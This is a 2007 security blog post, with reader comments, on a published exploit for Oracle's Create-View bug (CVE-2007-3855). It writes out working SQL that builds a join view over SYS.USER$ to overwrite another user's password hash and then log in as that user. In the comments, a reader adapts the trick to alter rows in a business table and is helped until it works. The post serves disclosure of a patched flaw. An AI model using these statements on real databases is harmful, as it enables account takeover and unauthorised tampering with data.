Exploit for Create View Problem published

Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.

Example:
– We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– The password is now changed to HACKED.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9

– But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– To activate the password change it is necessary to restart the database.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

5 Antworten auf “Exploit for Create View Problem published”

  1. Andre van Winssen sagt:

    Alex,
    I tried the bunkerview on a 10203 database which had patch 7 (6038241) applied which is also labeled as cpu APRIL 2007 and it failed. So looks like it was already fixed before Cpu July 2007 came out. I have the feeling that Oracle releases security fixes in between cpu’s as well.

    Below’s the patch history on windows 32 it platform for 10.2.0.3 since cpu april 2007:

    6116131 PATCH 8 WINDOWS 32 BIT 10.2.0.3 17-JUL-2007 (First Cpu July 2007)
    6038241 PATCH 7 WINDOWS 32 BIT 10.2.0.3 05-JUL-2007
    6012742 PATCH 6 WINDOWS 32 BIT 10.2.0.3 07-JUN-2007
    5946186 PATCH 5 WINDOWS 32 BIT 10.2.0.3 19-MAY-2007
    5948242 PATCH 4 WINDOWS 32 BIT 10.2.0.3 17-APR-2007 (First Cpu April 2007)

    SQL> show user
    USER is “HEK”
    SQL> select * from user_sys_privs;

    USERNAME PRIVILEGE ADM
    —————————— —————————————- —
    HEK CREATE SESSION NO
    HEK CREATE VIEW NO

    SQL> get bunkerview2
    1 create or replace view bunkerview as
    2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
    3* x.name=y.name
    SQL> /
    select x.name,x.password from sys.user$ x left outer join sys.user$ y on
    *
    ERROR at line 2:
    ORA-00942: table or view does not exist

  2. bunker sagt:

    You need the “select” privilege on sys.user$.

    Otherwise you can try to create a similar view on another table, where you can do select, and make update, insert or delete on it!

    Bye,

    bunker

  3. seydon sagt:

    Hi.

    Tried this.
    dont work.

    USERS PRIVILEGE:
    CREATE SESSION
    CREATE VIEW.

    Have right for select on table Contragent.
    Write script:
    create or replace view test_hack_view as select x.id, x.insiderid from cret.contragent x left outer join cret.contragent y on x.id=y.id;
    update test_hack_view set insiderid=’1′ where id=’12345′;

    GO/

    and receive error:
    ORA-01031: insufficient privileges.

    Whats right I must have for this exploit?

  4. Alexander Kornbrust sagt:

    Seydon,

    I don’t see the problem. You need only SELECT and CREATE VIEW privileges.
    What database version do you have? You could try the following view instead:

    create or replace hackcontra as

    This was one of our testcases:
    —————————
    create view hackdual as
    select * from dual

    delete from hackdual;

    rollback;

  5. seydon sagt:

    Thanks.
    It’s work!!!
    With “left join” - dont’t work.
    With “…WHERE ID IN…” work perfect.
    Version - 9.2.0.8.

Antwort schreiben

Sie müssen als angemeldet sein, um einen Kommentar schreiben zu können.